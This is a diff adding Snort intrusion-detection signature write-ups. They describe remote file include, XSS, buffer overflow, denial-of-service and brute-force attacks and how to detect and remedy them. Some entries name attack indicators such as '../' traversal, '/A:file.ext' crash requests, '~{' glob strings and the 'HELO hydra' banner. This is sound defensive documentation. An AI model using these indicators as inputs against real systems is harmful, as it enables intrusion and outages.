+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "GLOBALS[thispath]" parameter in the "ubbt.inc.php" script used by the "UBBThreads" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using UBBThreads
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000461.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000461
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Open WebMail" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "To" parameter in the "openwebmail-read.pl" 
+script used by the "Open WebMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Open WebMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1740.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1740
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/370.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+370
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a host running BeOS4.x.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a host running BeOS4.x contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS151
+
+--
--- /dev/null
+++ b/doc/signatures/2382.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+2382
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1909.txt
@@ -0,0 +1,70 @@
+Rule:
+
+Sid:
+1909
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) Calendar
+Manager Service daemon, cmsd.
+
+--
+Impact:
+Remote root access. The attack may allow execution of arbitrary commands
+with the privileges of root.
+
+--
+Detailed Information:
+The cmsd RPC service implements the Calendar Manager Service daemon that
+is often distributed with the Common Desktop Environment (CDE) and Open
+Windows. The Calendar Manager daemon provides appointment and scheduling
+functions for CDE. A buffer overflow exists in the rtable_insert()
+function because of improper bounds checking, allowing the execution of
+arbitrary commands with the privileges of root.  One possible exploit
+vector is by inserting appointments into the Calendar Manager database.
+ 
+--
+Affected Systems:
+	SCO Open UNIX 8.0
+	SCO UnixWare 7.1.1
+	HP-UX 10.20, 10.24, 10.30, 11.0
+	Sun Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6, 7.0
+	Sun SunOS 4.1.3, 4.1.4
+
+--
+Attack Scenarios:
+The attacker can use the exploit code to overflow the buffer allowing
+execution of arbitrary commands with the privileges of root.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1436.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1436
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/499.txt
@@ -0,0 +1,74 @@
+Rule:
+--
+
+Sid:
+499
+
+--
+
+Summary:
+This event is generated when a large ICMP packet is detected. Also known
+as the "Ping of Death".
+
+--
+Impact:
+Denial of Service (DoS) by system crash or bandwidth utilisation.
+
+--
+Detailed Information:
+Some implementations of the IP stack may result in a system crash 
+or may hang when a large ICMP packet is sent to them. Alternatively 
+a large number of these packets may result in link saturation, 
+especially where bandwidth is limited.
+
+This attack was prevalent a number of years ago when the TCP/IP stack of
+a number of operating systems could not handle large packet payloads.
+
+--
+Affected Systems:
+	Multiple older systems.
+
+--
+Attack Scenarios: 
+A malicious individual may send a series of large ICMP packets 
+to a host with the intention of either crashing or hanging the host, 
+or to saturate the available bandwidth.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A number of load balancing applications use 1500 byte ICMP packets to 
+determine the most efficent route to a host by measuring the latency 
+of multiple paths.
+
+HP-UX systems configured with PMTU discovery will send echo requests 
+in response to several types of network connections. PMTU Discovery 
+is enabled in HP-UX 10.30 and 11.0x by default.
+
+Windows 2000 uses large ICMP payloads to determine the speed of a link
+when utilizing a Windows domain controller.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ICMP Traffic - Seth Stein
+http://www.wfu.edu/~steinsj5/work/icmp.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000131.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+100000131
+
+-- 
+Summary: 
+This event is generated when a request for a file residing on a floppy drive is 
+sent to the PY Software Active Webcam Server. 
+
+-- 
+
+Impact: 
+A denial of service will result, and the server will need to be manually 
+restarted.
+
+--
+Detailed Information:
+Requests for files residing on a floppy drive will cause the PY Software Active 
+Webcam Server to crash. This rule looks for requests in the form of 
+"/A:file.ext" on port 8080, the default port for this server.
+
+--
+Affected Systems:
+PY Software Active WebCam 4.3
+PY Software Active WebCam 5.5
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or a script.
+
+-- 
+
+Ease of Attack: 
+Simple, as it can be exploited using a web browser.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Currently, there are no known workarounds or fixes.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000161.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+100000161
+
+-- 
+Summary: 
+This event is generated when an abnormally larger number of unresolvable DNS 
+queries are generated by a particular host.
+
+--
+Impact:
+This can be an indication of a denial of service attack in progress.
+
+--
+Detailed Information:
+Since SIP systems can be overwhelmed by being forced to deal with an overly 
+large number of invalid hostnames, this rule is designed to detect such attacks 
+by searching for large volumes of DNS responses which contain the message "No 
+such name".
+
+--
+Affected Systems:
+Any which implement the SIP protocol.
+
+--
+Attack Scenarios:
+An attacker could use a script to flood a system with requests from invalid 
+hosts, causing a denial of service.
+
+--
+Ease of Attack:
+Simple, as it is trivial to write a script to generate requests with invalid 
+hostnames.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a firewall or other access-restriction device to block unwanted messages at 
+your network's border.
+
+--
+Contributors:
+Jiri Markl <jiri.markl@nextsoft.cz>
+Sourcefire Research Team
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/2615.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2615
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "grant_surrogate_repcate" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "userid" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000386.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000386
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ottoman" application running on a webserver. Access to the file "main_class.php" using a remote file being passed as the "default_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "default_path" parameter in the "main_class.php" script used by the "Ottoman" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ottoman
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1837.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1837
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "alt.binaries.pictures.tinygirls".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "alt.binaries.pictures.tinygirls".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/954.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+954
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2786.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2786
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure generate_replication_package
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/275.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+275
+
+--
+Summary:
+This event is generated when a remote attacker transmits a malformed TCP packet to an internal server. This may indicate a "NAPTHA" Denial of Service (DoS) attack.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+An attacker can craft a TCP packet that, when transmitted to the target server, maintains the TCP session on the target server in an unresolved state. This consumes system resources and overwhelms the target server, causing the server to stop responding to other network requests. In some cases, this type of attack can crash the target server.   
+
+--
+Affected Systems:
+Microsoft Windows 95
+Microsoft Windows 98
+Microsoft Windows 98SE
+Microsoft Windows Millennium
+Windows NT 4.0
+HP-UX 11
+IBM AIX 4.3
+Sun Solaris 7-8
+FreeBSD 4.0-REL
+Redhat Linux 6.1 - 7.0
+Other Linux operating systems based on the Linux 2.0 kernel
+
+
+--
+Attack Scenarios:
+An attacker sends a number of malformed TCP packets to a target computer. The computer attempts to maintain all incoming connections, causing it to slow down or stop responding to legitimate network requests.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the latest patches available for your operating system. Patches and workarounds for Microsoft are available at http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-091.asp.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1123.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1123
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/119-10.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+119-10
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This event may also constitute an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects the
+use of directory traversal in a web request. This may be an attempt to
+escape the web root directory or it may be an attempt to evade an IDS.
+
+--
+Affected Systems:
+	Microsoft IIS Servers
+
+--
+Attack Scenarios: 
+An attacker may supply a path to a file outside the web root by using
+"../" in the uri.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+This event may be generated if a web site uses "../" in links to other
+files on the site.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/1378.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1378
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a file
+globbing vulnerability associated with WU-FTPD.
+
+--
+Impact:
+Serious. Remote root access. A successful attack can allow remote
+execution of commands with privileges of WU-FTPD, most often root.
+
+--
+Detailed Information:
+An exploit in Washington University FTP daemon (WU-FTPD) code associated
+with file globbing can allow execution of arbitrary code with the
+privileges of WU-FTPD, typically root. WU-FTPD invokes the glob function
+when certain characters are used in a file name argument supplied by an
+FTP client. The glob function fails to properly handle illegal strings
+such as "~{" and "~[". The problem is compounded when the glob function
+returns an error condition that is incorrectly handled, which may lead
+to the corruption of process memory space. This exploit requires login
+access to a vulnerable server either via an anonymous or established
+user account.
+
+--
+Affected Systems:
+	WU-FTPD 2.6.1, 2.6.0, and 2.5.0.
+
+--
+Attack Scenarios:
+An attacker may login to a vulnerable WU-FTP server and enter a
+malformed file argument to gain access and execute arbitrary commands.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patch.
+
+Do not enable anonymous FTP access unless required.  
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/886083
+
+--
--- /dev/null
+++ b/doc/signatures/100000499.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000499
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PictureDis" application running on a webserver. 
+Access to the file "thumstbl.php" using a remote file being passed as the 
+"lang" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "lang" parameter in the "thumstbl.php" script used by 
+the "PictureDis" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PictureDis
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000167.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000167
+
+-- 
+Summary: 
+The password-cracking tool Hydra has been detected in SMTP traffic.
+
+--
+Impact:
+An attacker may be attempting to break into one or more mail servers monitored 
+by Snort via a brute-force password attack. If successful, the attacker may 
+gain unauthorized access to internal networks.
+
+--
+Detailed Information:
+Hydra is a password-cracking tool released by a group of security experts 
+called THC, "The Hacker's Choice." When connecting to a mail server, it will 
+begin communications by sending either "HELO hydra" or "EHLO hydra", depending 
+upon the commands accepted by the remote server. Since a valid HELO or EHLO 
+command will contain the domain name of the system mail is being sent from, the 
+presence of either of these strings indicates that the Hydra tool is likely 
+being used.
+
+--
+Affected Systems:
+Any system running a mail server.
+
+--
+Attack Scenarios:
+Attackers will use the Hydra password-cracking tool.
+
+--
+Ease of Attack:
+Simple, as the program is publicly available and is well-documented.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check system logs and Snort alert logs for suspicious activity, particularly 
+unusual logons. Ensure that secure passwords are being used throughout your 
+network.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+
+--
--- /dev/null
+++ b/doc/signatures/693.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
